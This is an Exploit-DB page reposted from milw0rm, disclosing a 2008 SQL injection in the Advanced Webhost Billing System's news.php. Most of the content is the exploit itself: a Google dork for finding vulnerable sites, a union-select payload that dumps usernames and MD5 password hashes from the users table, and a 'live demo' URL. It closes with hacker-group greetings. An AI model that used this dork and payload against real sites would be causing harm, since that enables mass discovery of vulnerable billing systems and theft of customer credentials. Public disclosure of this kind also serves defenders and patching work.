Advanced Webhost Billing System (AWBS) 2.7.1 - 'news.php' SQL Injection

EDB-ID:

5823


Author:

Mr.SQL

Type:

webapps


Platform:

PHP

Date:

2008-06-15


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## AWBS  Versions ( 2.3.3 - v2.5.0 - v2.6.3 - 2.7.0 - V2.7.1 )  (( news.php viewnews ))
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.PaL-HaCkEr.CoM
##
## Email  : SQL@Hotmail.it
##
## !! SYRIAN HaCkErS  !!
########################
########################
##
## Script   : AWBS
##
## Versions : ( 2.3.3 - v2.5.0 - v2.6.3 - 2.7.0 - V2.7.1 )
##
##  Site    : www.awbs.com
##
########################
########################
########################
########################
##
##    d0rk :  allinurl: "news.php?viewnews"
##
##
##     -(:: SQL ::)-
##
##    www.site.com/
##              news.php?viewnews=-1'+union+select+1,2,username,password,5,6,7+from+users/*
##
##
##  -(:: L!VE DEMO ::)-
##
##     www.awbsdemo.com/news.php?viewnews=1
##
########################
########################
  -(:: N0te ::)-
  All the versions have same exploit and all the sites web hosting :))        
  (( Passwords => MD5 ))
######################################################################################################
######################################################################################################
                                   -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
######################################################################################################
######################################################################################################

# milw0rm.com [2008-06-15]